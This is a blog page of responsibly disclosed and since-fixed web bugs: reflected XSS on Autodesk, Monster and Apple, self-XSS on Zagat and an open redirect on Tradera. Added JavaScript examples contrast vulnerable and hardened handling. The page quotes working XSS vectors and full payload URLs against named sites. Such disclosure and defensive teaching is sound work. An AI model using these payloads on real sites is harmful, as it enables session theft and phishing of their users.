Monday, 14 January 2013

[ Resolved XSS on Autodesk.com ]


This is a "Reflected XSS" I found on autodesk.com. I reported it responsibly on 30/06/2012 and they fixed it silently without replying.

Severity: Reflected XSS
Confidence: Certain
Host: http://usa.autodesk.com/
Path:  /adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=

Issue detail:
What I did was enter the XSS vector below in the search field. A vector of this shape targets a search term that is reflected inside a <script> block: the leading </script> ends that element as far as the HTML parser is concerned (no JavaScript-level escaping of the string helps at that point), and the <script> that follows is parsed as a fresh one.
</script><script>alert(document.cookie)</script>

The final URL looks like this:
http://usa.autodesk.com/adsk/servlet/u/gsearch/results?siteID=123112&catID=123155&id=2088334&qt=</script><script>alert(document.cookie)</script>&x=0&y=0

This is the screenshot after I sent the payload.



Reported by: Jacob Soo
Vendor Notification: June 30, 2012
Resolution: Vendor silently fixed it

[ Resolved Open Redirect on tradera.com ]


This is an "Open Redirect" bug I found on tradera.com. I reported it responsibly on 20/06/2012 and eBay have fixed it.

Severity: URL Redirection
Confidence: Certain
Host: http://zandra.tradera.com/
Path: /event/uoqru/tradera.content.ros/2381283037/click?url=http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880

Issue detail:
The link was found on the main page of tradera.com.
If I replace "click?url=http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880" with "http://www.ebay.de" (without the quotes), the click-tracking endpoint sends me to ebay.de instead of a tradera.com listing.

If attackers were to send such a link to innocent victims, who see only the trusted tradera.com domain in it, the victims could be redirected to a malicious website rather than to ebay.de, exactly as in the example above.
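
The click-tracking redirect described above, written out as an added example (not code from the original post and not tradera.com's own handler; only the behaviour, that the url parameter is followed unchecked, is on the page). The vulnerable form returns the parameter as-is; the hardened form parses it with the WHATWG URL parser and accepts only http(s) targets on an assumed allowlist of the site's own hosts. The host list, the fallback and the test inputs are assumptions; the first test input is the value from the report.

```javascript
// Added example, not code from the original post or from tradera.com: the
// click-tracking redirect the report describes, as a hypothetical Node.js handler,
// in its vulnerable and hardened forms. Plain Node.js, no dependencies.

const SITE = 'https://www.tradera.com/';
// Assumed allowlist of the site's own hosts; everything else falls back to SITE.
const ALLOWED_HOSTS = new Set(['tradera.com', 'www.tradera.com', 'zandra.tradera.com']);

// Vulnerable: the Location header is whatever url= said.
function redirectTargetUnsafe(urlParam) {
  return urlParam;
}

// Hardened: parse with the WHATWG URL parser, resolving relative values against
// our own origin, and accept only http(s) to an allowlisted host. Returning the
// re-serialised URL rather than the raw parameter also defeats tricks that rely
// on the browser parsing the string differently from the server.
function isOnSite(urlParam) {
  let u;
  try { u = new URL(urlParam, SITE); } catch (e) { return false; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  if (u.username !== '' || u.password !== '') return false;   // http://www.tradera.com@evil/ style
  return ALLOWED_HOSTS.has(u.hostname);
}

function redirectTargetSafe(urlParam) {
  return isOnSite(urlParam) ? new URL(urlParam, SITE).href : SITE;
}

// Constructed inputs with the expected decision. The first is the value from the
// report above, the second is the substitution the report describes.
const CASES = [
  ['http://www.tradera.com/spion-klocka-spy-watch-4gb-8mp-hd-kamera-vattentatt-30m-ny-auktion_342906_158165880', true],
  ['http://www.ebay.de', false],
  ['//www.ebay.de/', false],                         // protocol-relative
  ['/\\www.ebay.de', false],                         // backslash is a slash for http(s) URLs
  ['http:\\\\www.ebay.de', false],
  ['http://www.tradera.com.evil.example/', false],   // prefix match is not host match
  ['http://www.tradera.com@evil.example/', false],   // userinfo trick
  ['javascript:alert(document.cookie)', false],
  ['/auktion/12345', true],                          // relative paths stay on-site
];

// Returns the inputs whose decision differs from expectation (empty = all good).
function mismatches() {
  return CASES.filter(([input, expected]) => isOnSite(input) !== expected)
              .map(([input]) => input);
}

for (const [input] of CASES) {
  console.log(`${input}\n  unsafe -> ${redirectTargetUnsafe(input)}\n  safe   -> ${redirectTargetSafe(input)}`);
}
console.log('mismatches:', mismatches());
```

The point of the allowlist-by-hostname check (rather than a prefix test such as `startsWith('http://www.tradera.com')`) is visible in the test inputs: `www.tradera.com.evil.example` and `www.tradera.com@evil.example` both pass a prefix test and both fail the host test, and the protocol-relative and backslash forms are normalised by the parser before the comparison is made.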


Reported by: Jacob Soo
Vendor Notification: June 20, 2012
Resolution: October 27, 2012

[ Resolved Self-XSS on Zagat.com ]


This is a "Self XSS" I found on zagat.com. I reported it responsibly on 19/05/2012 and Google fixed it within days.

Severity: Self-XSS
Confidence: Certain
Host:   http://www.zagat.com
Path:   GET /search/location

Issue detail:
The XSS vector in my example is
"><img src=x onerror=prompt(1);>
I submitted it in the middle of the value of the "location" field; for my example I used "annandale, va".
This input was echoed as
annan"><img src=x onerror=prompt(1);>+dale%2C+va
in the application's response. Note that the original text around the vector comes back URL-encoded (+ for the space, %2C for the comma) while the injected ", < and > are echoed verbatim.

This proof of concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the leading "> closes the quoted attribute the location value is echoed into, and the browser then parses the injected <img> element and runs its onerror handler (src=x never loads, so the handler always fires).

Note that this technique works on all the browsers I currently have installed.

This is the screenshot after I sent the payload.



Reported by: Jacob Soo
Vendor Notification: May 19, 2012
Resolution: May 24, 2012

[ Resolved XSS on Monster.com ]



This is a "Reflected XSS" I found on monster.com. I reported it responsibly on 28/06/2012 and monster.com fixed it silently without replying to me. Life is such.

Severity: Reflected XSS
Confidence: Certain
Host: http://jobsearch.monster.com/
Path: /search/

Issue detail:
What I did was enter the XSS vector below in the search fields.
"><img src=x onerror=prompt(document.cookie);>

You end up with a URL like the following; the site rewrites the search terms into the path and into the q and where parameters, writing characters such as ", <, > and = as __22, __3E, __3C and __3D:
http://jobsearch.monster.com/search/__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E_5?q=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E&where=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E
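
The URL rewrite visible in that address, decoded, as an added example (not code from the original post or from monster.com). Everything it knows comes from the recorded URL: a quoted character is written as two underscores and its hex byte value, and a space becomes a hyphen (img-src, onerror). The hyphen rule and the assumption that the scheme covers every byte are inferred, not documented on the page; the trailing _5 on the path segment is treated as a separate suffix. Note also that the recorded URL carries alert(...) where the vector quoted just above uses prompt(...).

```javascript
// Added example, not from the original post: decoder and encoder for the
// "pretty" slug format seen in the recorded monster.com URL above. The format is
// reverse-engineered from that one URL (assumption: __XX is the hex byte value,
// "-" is a space, letters, digits and "." pass through unchanged).

function decodeMonsterSlug(slug) {
  // One pass over both forms, so a decoded __2D ("-") is not then taken for a space.
  return slug.replace(/__([0-9A-Fa-f]{2})|-/g, (m, hex) =>
    hex === undefined ? ' ' : String.fromCharCode(parseInt(hex, 16)));
}

function encodeMonsterSlug(text) {
  return text.replace(/[^A-Za-z0-9.]/g, c =>
    c === ' ' ? '-' : '__' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'));
}

// Pull every reflected copy of the search term out of a recorded URL: the first
// path segment after /search/ (minus its numeric _N suffix) and the q and where
// query parameters.
function payloadsInUrl(urlString) {
  const u = new URL(urlString);
  const segment = u.pathname.split('/')[2] || '';
  const slug = segment.replace(/_\d+$/, '');
  return {
    path:  decodeMonsterSlug(slug),
    q:     decodeMonsterSlug(u.searchParams.get('q') || ''),
    where: decodeMonsterSlug(u.searchParams.get('where') || ''),
  };
}

// The URL exactly as recorded in the report above.
const RECORDED = 'http://jobsearch.monster.com/search/__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E_5'
  + '?q=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E'
  + '&where=__22__3E__3Cimg-src__3Dx-onerror__3Dalert__28document.cookie__29__3E';

console.log(payloadsInUrl(RECORDED));
```

Decoding all three copies gives the same `"><img src=x onerror=alert(document.cookie)>`, which is the point worth taking from the URL: the rewrite is a reversible transport encoding, not an output encoding, so the characters that break out of an attribute arrive at the page intact.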

This is the screenshot after I sent the payload.



Reported by: Jacob Soo
Vendor Notification: June 28, 2012
Resolution: July 2012

[ Resolved XSS on Apple.com ]



This is a "Reflected XSS" I found on apple.com, which I reported responsibly on 04/08/2012.
I'll be blogging about some web bugs I've reported and which have since been fixed. :D


Severity: Reflected XSS
Confidence: Certain
Host: http://www.apple.com/recycling/ipod-cell-phone/
Path: /

Issue detail:
What I did was pop up an alert using the payload below. The base64 string decodes to <body onload=alert(document.cookie)>, so the injected iframe loads a data: document that runs alert(document.cookie) as soon as its body loads.
"<iframe src="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk+"></iframe>
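
The two reflection contexts that the four XSS reports on this page exercise, rendered side by side as an added example (not code from the original post, nor from Autodesk, Zagat, Monster or Apple, whose real page templates are not on this page): a quoted attribute for the "> vectors used against zagat.com, monster.com and apple.com, and a <script> block for the </script> vector used against autodesk.com. The templates, the variable names and the round-trip check are assumptions; the payloads are the ones quoted in the reports. The block also decodes the Apple payload's data: URI to show what the frame actually contains.

```javascript
// Added example, not code from the original post or from any vendor named on it:
// hypothetical templates for an attribute sink and a script-block sink, in
// vulnerable and hardened form, plus a check that tells the two apart.
// Plain Node.js, no dependencies.

// Payloads exactly as given in the reports above.
const PAYLOADS = {
  autodesk: '</script><script>alert(document.cookie)</script>',
  zagat:    '"><img src=x onerror=prompt(1);>',
  monster:  '"><img src=x onerror=prompt(document.cookie);>',
  apple:    '"<iframe src="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk+"></iframe>',
};

// Two hypothetical sinks: a quoted attribute (line 1) and a JS string literal
// inside a <script> block (line 2), each echoing the search term raw.
function renderUnsafe(q) {
  return `<input name="q" value="${q}">\n<script>var query = "${q}";</script>`;
}

// Attribute context: entity-encode the five characters that matter there.
function encodeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Script context: entities are NOT decoded inside <script>, and JSON.stringify
// alone is not enough because the HTML tokenizer ends the element at the first
// "</script" it meets, before the JS engine ever sees the string. So serialise
// as JSON, then write < and > (and the JS line terminators U+2028/U+2029) as
// \uXXXX escapes, which the HTML parser leaves alone and JS turns back into
// the original characters.
function encodeJsValue(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}

function renderSafe(q) {
  return `<input name="q" value="${encodeAttr(q)}">\n<script>var query = ${encodeJsValue(q)};</script>`;
}

// A common mistake: the attribute encoder applied to the script context. Nothing
// executes, but the script no longer receives what the user typed.
function renderWrongEncoder(q) {
  return `<input name="q" value="${encodeAttr(q)}">\n<script>var query = "${encodeAttr(q)}";</script>`;
}

function decodeEntities(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (_, e) => map[e]);
}

// Did the user's text survive each sink intact? The attribute is read back the
// way the HTML parser would (up to the next double quote); the script text is
// cut at the first "</script" as the tokenizer does, and the literal is then
// parsed as JSON, a strict subset of a JS string literal. Any break-out shows
// up as a value that no longer round-trips.
function analyse(html, q) {
  const attr = /^<input name="q" value="([^"]*)"/.exec(html);
  const attrIntact = attr !== null && decodeEntities(attr[1]) === q;

  const line2 = html.split('\n')[1];
  const end = line2.toLowerCase().indexOf('</script', '<script>'.length);
  const js = line2.slice('<script>'.length, end);          // what the JS engine gets
  let jsIntact = false;
  if (js.startsWith('var query = ') && js.endsWith(';')) {
    try { jsIntact = JSON.parse(js.slice('var query = '.length, -1)) === q; } catch (e) { /* broken literal */ }
  }
  return { attrIntact, jsIntact };
}

// What the Apple payload's frame actually contains.
function decodeDataUri(payload) {
  const m = /data:text\/html;base64,([A-Za-z0-9+\/=]+)/.exec(payload);
  return m ? Buffer.from(m[1], 'base64').toString('utf8') : null;
}

function report() {
  const out = {};
  for (const [name, q] of Object.entries(PAYLOADS)) {
    out[name] = {
      unsafe: analyse(renderUnsafe(q), q),
      wrong:  analyse(renderWrongEncoder(q), q),
      safe:   analyse(renderSafe(q), q),
    };
  }
  return out;
}

console.log(JSON.stringify(report(), null, 2));
console.log('apple frame content:', decodeDataUri(PAYLOADS.apple));
```

Two things the output makes concrete. The autodesk.com vector leaves the attribute sink intact and only breaks the script sink, while the three "> vectors break the attribute sink, which is why the fix has to be chosen per context rather than as one global "HTML encode" pass; and the "wrong" renderer shows that entity-encoding into a script block trades the injection for corrupted data. One caveat on the Apple payload: current Chrome and Firefox give a data: iframe an opaque origin of its own (Firefox changed this in version 57), so alert(document.cookie) inside such a frame shows an empty string today; the alert still proves injection, it just no longer demonstrates cookie access.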



This is the screenshot before I sent my payload.



This is the screenshot after I sent the payload.



Reported by: Jacob Soo
Vendor Notification: August 04, 2012
Resolution: September 26, 2012